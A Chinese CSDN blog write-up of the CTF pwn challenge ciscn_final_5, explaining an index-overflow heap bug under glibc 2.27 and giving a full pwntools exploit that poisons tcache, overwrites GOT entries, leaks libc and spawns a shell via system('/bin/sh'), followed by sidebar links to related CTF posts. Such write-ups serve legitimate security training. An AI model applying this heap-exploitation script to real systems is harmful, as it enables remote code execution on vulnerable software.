ciscn_final_5

最新推荐文章于 2024-07-25 10:00:08 发布
最新推荐文章于 2024-07-25 10:00:08 发布
阅读量418 收藏
点赞数
分类专栏: pwn 二进制漏洞 CTF 文章标签: PWN CTF 二进制漏洞 缓冲区溢出 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/seaaseesa/article/details/105407382
版权
pwn 同时被 3 个专栏收录
161 篇文章 24 订阅
订阅专栏
二进制漏洞
161 篇文章 9 订阅
订阅专栏
CTF
161 篇文章 9 订阅
订阅专栏

ciscn_final_5

首先,检查一下程序的保护机制

然后,我们用IDA分析一下

程序将下标存储到了堆地址的低4位里

操作的时候再清除低4位地址值。

问题就在于当index为16的时候,低4位已经无法表示了,这就造成了溢出

假如我的堆地址为0x10,我的index16,那么,经过运算,保存的地址为0x20,这样free的时候,就是free(0x20)。因此,我们可以在堆里伪造堆,从而把伪造的堆给free掉。又因为glibc版本为2.27,tcache 缺少很多检查,所以可以很容易free。

通过伪造size,free后进入对应size的tcache,然后申请回来,就能控制下方堆的内容了。

改写下方chunk的fd为got表,修改got表为system地址,即可完成利用。

#coding:utf8
from pwn import *

#context.log_level = 'debug'
#sh = process('./ciscn_final_5')
sh = remote('node3.buuoj.cn',29906)
elf = ELF('./ciscn_final_5')
libc = ELF('/lib/x86_64-linux-gnu/libc-2.27.so')
alarm_s = libc.sym['alarm']
alarm_got = elf.got['alarm']
free_got = elf.got['free']
puts_plt = elf.plt['puts']

def add(index,size,content):
   sh.sendlineafter('your choice:','1')
   sh.sendlineafter('index:',str(index))
   sh.sendlineafter('size:',str(size))
   sh.sendafter('content:',content)

def delete(index):
   sh.sendlineafter('your choice:','2')
   sh.sendlineafter('index:',str(index))

def edit(index,content):
   sh.sendlineafter('your choice:','3')
   sh.sendlineafter('index:',str(index))
   sh.sendafter('content:',content)

#0
add(0x10,0x10,p64(0) + p64(0x51))
#删除伪造的chunk
delete(0)
#1
add(1,0x10,'a'*0x10)
#2
add(2,0x30,'b'*0x30)
#将1放入tcache bin
delete(1)
#将伪造的chunk申请出来,控制chunk1的next指针为free的got表
add(0,0x40,'b'*0x10 + p64(alarm_got))
add(3,0x10,'c'*0x10)
#申请到alarm的got表处
add(4,0x10,'a')
#将2放入tcache bin
delete(2)
#修改2的tcache bin的next指针
edit(0,'b'*0x30 + p64(free_got))
add(5,0x30,'/bin/sh\x00')
#修改free的got表为puts的plt表
add(6,0x30,p64(puts_plt))
#泄露alarm的地址
delete(4)
sh.recv(1)
alarm_addr = (u64(sh.recv(6).ljust(8,'\x00')) & 0xFFFFFFFFFFFFFF00) + (alarm_s & 0xFF)
libc_base = alarm_addr - alarm_s
system_addr = libc_base + libc.sym['system']
print 'libc_base=',hex(libc_base)
print 'system_addr=',hex(system_addr)
#修改free的got表为system
edit(14,p64(0) + p64(system_addr))
#getshell
delete(5)

 

ha1vk
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
full_stack_final.zip
08-16
5. **示例**:针对特定技术或概念的示例代码,帮助理解如何在实际项目中应用。 6. **测试**:单元测试和集成测试代码,确保软件功能的正确性。 7. **部署脚本**:如Dockerfile或CloudFormation模板,用于在各种环境...
mobilenet0.25_Final.zip
03-16
标题中的“mobilenet0.25_Final.zip”指的是一个基于MobileNet模型的压缩文件,其中的模型参数已经训练完成并被保存为“mobilenet0.25_Final.pth”。MobileNet是一种轻量级的深度学习网络架构,设计用于在移动设备上...
ciscn_2019_final_2
z1r0的博客
02-10 466
ciscn_2019_final_2 查看保护 在delete这里的话有两个uaf。还开了沙盒,说实话一开始真没什么思路,看了一下ha1vk的wp才知道漏了一init里面的一个非常重要的东西 这里读flag。flag的文件描述符被设置成了666 泄露数据的话也不是很多。几个字节 攻击思路:因为是2.27下,double free泄露出堆的低位地址,利用double free将size改为0x91,这个时候可以tcache attack泄露出main_arena的低位。 libc的这些低位都有了之后接
2024CISCN 全国大学生信息安全竞赛创新实践赛MISC部分WP
weixin_62467741的博客
05-22 907
最开始得到的是一个内存文件dmp和一个exe,猜测dmp对应的是找浏览器记录,exe对应的是c2地址,exe在虚拟机里运行一下得到的是一个.ss文件夹里面有loader.exe和一个png,png最上面有数据块,直接stegsolve过滤r全通道,savebin,得到类似于zip的文件。在ppt/embeddings文件夹下的docx中,从PPT打开的话就是第二章左上角那块黑色的,双击就行,打开后全选,改字体大小,改颜色,凯撒偏移量10解密,然后base64解密,得到part2。然后base64解码。
ciscn_2019_final_3
、moddemod
07-08 641
tcache机制的利用,通过unsorted泄露进而将堆空间开辟到libc中,写__free_hook拿到shell… exp from pwn import * context.log_level = 'debug' def pause_debug(): log.info(proc.pidof(p)) pause() def add(idx, size, content): p.sendlineafter('choice >', str(1)) p.sendl.
[BUUCTF]-PWN:ciscn_2019_final_3解析(tcache dup)
2301_79326813的博客
02-15 415
查看保护RELRO保护为FULL,got表不可修改,只能修改hook表了查看ida这里的大致功能为alloc创建堆块(可填充内容)、free释放堆块(但是不清空指针)值得注意的就是创建堆块大小不可以超过0x78(实际大小会对齐)
ciscn_2019_final_5
z1r0的博客
02-28 238
ciscn_2019_final_5 查看保护 当index为16的时候,经过运算保存的地址为0x20其实也就是heap的初初始地址+0x20。一开始没怎么看懂这些逻辑然后看了一下ha1vk的wp就懂了(XD 攻击思路:因为16的时候在堆的+0x20,所以只需要在堆里伪造一个堆块,然后释放再申请就可以改下面的一些堆块,把下面的堆块释放掉之后通过伪造的堆来改他们的fd达到任意地址申请即可。具体的tcache dup看z1r0’s blog from pwn import * context(arch=
buuoj刷题记录 - ciscn_2019_final_3
qq_34010404的博客
03-25 415
看了大佬们的思路才做出来的,这里只记录一下做题中踩的坑。 1.add函数 2.del函数 free后没有把数组元素标记为0,存在UAF漏洞. 思路是:1.double free 改fd 到 另一个chunk 的首地址处,然后修改chunksize ,原因是程序限制了分配大小为120字节,free到unsorted bin里面。 2.free chunk 到unsorted bin里面 3.double free 修改fd 到第二步中的chunk,之后便可以malloc 到unsorted bin处,然后
ciscn_final_6
seaaseesa的博客
06-11 391
ciscn_final_6 首先,检查一下程序的保护机制 然后,我们IDA分析一下,在store_game函数里的getInput存在null off by one漏洞 常规的null off by one漏洞,只是本题逻辑复杂了一点,需要精心构造一下。 #coding:utf8 from pwn import* #sh = process('./ciscn_final_6') sh = remote('node3.buuoj.cn',27827) libc = ELF('/lib/x8
ciscn_final_3
seaaseesa的博客
04-09 343
ciscn_final_3 程序给的glibc版本为2.27,存在tcache机制 首先检查一下程序的保护机制 然后,我们用IDA分析一下 Delete功能存在UAF漏洞 程序没有show的功能,但是add时,会显示堆的地址。 为了能够泄露出glibc地址,我们就要依靠这个add时打印的堆地址。我们只要让tcache bin和unsorted bin重合,那么就能通过申请,...
[Buuoj刷题]ciscn_2019_final_3 tcache attack
zylxixixi的博客
10-09 307
Tcache机制的引入 libc2.26以后引入了一个新的机制tcache,类似于fastbin,每条链上允许有7个chunk,多出的chunk会直接放入相应的fastbin或者Unsortedbin,跟以往不同的是,当用户申请chunk时,会优先寻找tcache中的chunk。 因为该机制的引入,提升了处理的速度,但安全性减低了,例如fastbin attach中的double free(tcache dup),free的时候会检查第一个chunk是否为自己,绕过该机制需要构造a->b->
[BUUCTF]PWN——ciscn_2019_final_2
mcmuyanga的博客
03-10 1111
ciscn_2019_final_2 附件 步骤 例行检查,64位程序,保护全开 本地没有flag文件,远程连接一下,经典的堆题的菜单 64位ida载入 init() allocate(),只可以申请0x20或者0x10的chunk delete() show(),show只能调用3次 bye_bye 这道题的关键点在于文件流的知识 dup2 用来复制文件描述符:int dup2 (int oldfd,int newfd) _fileno 是用来规定 fd 所指向的文件流的,i
lesson_test_calculator_final.rar_Final Test
09-19
标题 "lesson_test_calculator_final.rar_Final Test" 暗示我们正在处理一个关于软件开发的项目,特别是针对Symbian V3操作系统的一个最终测试版本。这个简易计算器是使用QT4框架在该平台上构建的,目的是作为新手...
FINAL_OFDM_FINAL_OFDM_
10-01
FINAL_OFDMOFDM(Orthogonal Frequency Division Multiplexing)即正交频分复用技术,实际上OFDM是MCM(Multi Carrier Modulation),多载波调制的一种。通过频分复用实现高速串行数据的并行传输
detection_Resnet50_Final.pth, Resnet50_Final.pth
03-16
标题中的“detection_Resnet50_Final.pth”和“Resnet50_Final.pth”两个文件名,以及描述中的“md5: bce939bc22d8cec91229716dd932e”,揭示了与深度学习相关的知识点,特别是图像检测领域的一个模型权重文件。...
企业如何保证公司内网安全
最新发布
shunyou0526的博客
07-25 326
部署防火墙和入侵检测系统:作为内网安全的第一道防线,防火墙和入侵检测系统能够有效阻止外部攻击和恶意软件的入侵。访问控制与身份验证:实施严格的访问控制策略,结合多因素认证(MFA),确保只有授权用户才能访问关键系统和数据。日志管理:建立全面的日志记录和审计机制,对所有数据访问、修改、删除等操作进行记录,以便于追踪和分析。电脑监控软件:使用电脑监控软件来监控员工的屏幕活动、上网行为等,防止内部威胁和不当使用公司资源。反病毒软件与反间谍软件:部署反病毒软件和反间谍软件等恶意软件防护工具,实时监测和清除恶意软件。
极速下载!青苹果系统Win7旗舰版:稳定安全
lihuiyun184291的博客
07-25 404
今天系统之家小编给大家带来了青苹果系统Win7旗舰版镜像,该版本系统离线制作而成,安全无病毒,还升级了防火墙功能,大家安装后时刻都能放心操作。同时,它是在保持原有的功能并适度优化,保留下来的功能轻松满足大家的使用需求,系统稳定性也很高,运作顺畅不卡顿。
微软蓝屏事件引发对构建更加稳固和安全的网络环境的思考
lupai的博客
07-24 486
综上所述,构建更加稳固和安全的网络环境需要政府、企业和用户共同努力,从政策、技术、用户行为等多个方面入手,形成全方位、多层次的网络安全防护体系。构建更加稳固和安全的网络环境是一个系统工程,需要从多个方面入手,包括政策、技术、用户行为等多个层面。建立完善的应急响应机制,制定应急预案和演练计划,提高应对网络攻击和突发事件的能力。鼓励和支持网络安全技术的研发和创新,推动新技术在网络安全领域的应用和推广。加强对用户的网络安全教育,提高用户的网络安全意识和防范能力。
hwindow_final
11-29
hwindow_final是一个通过改进窗户设计来提高建筑能效的项目。该项目旨在利用智能技术和可持续材料来创造更加节能和环保的窗户系统。hwindow_final项目的关键特点包括高效的隔热和隔音性能、自动调节的智能控制系统、...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值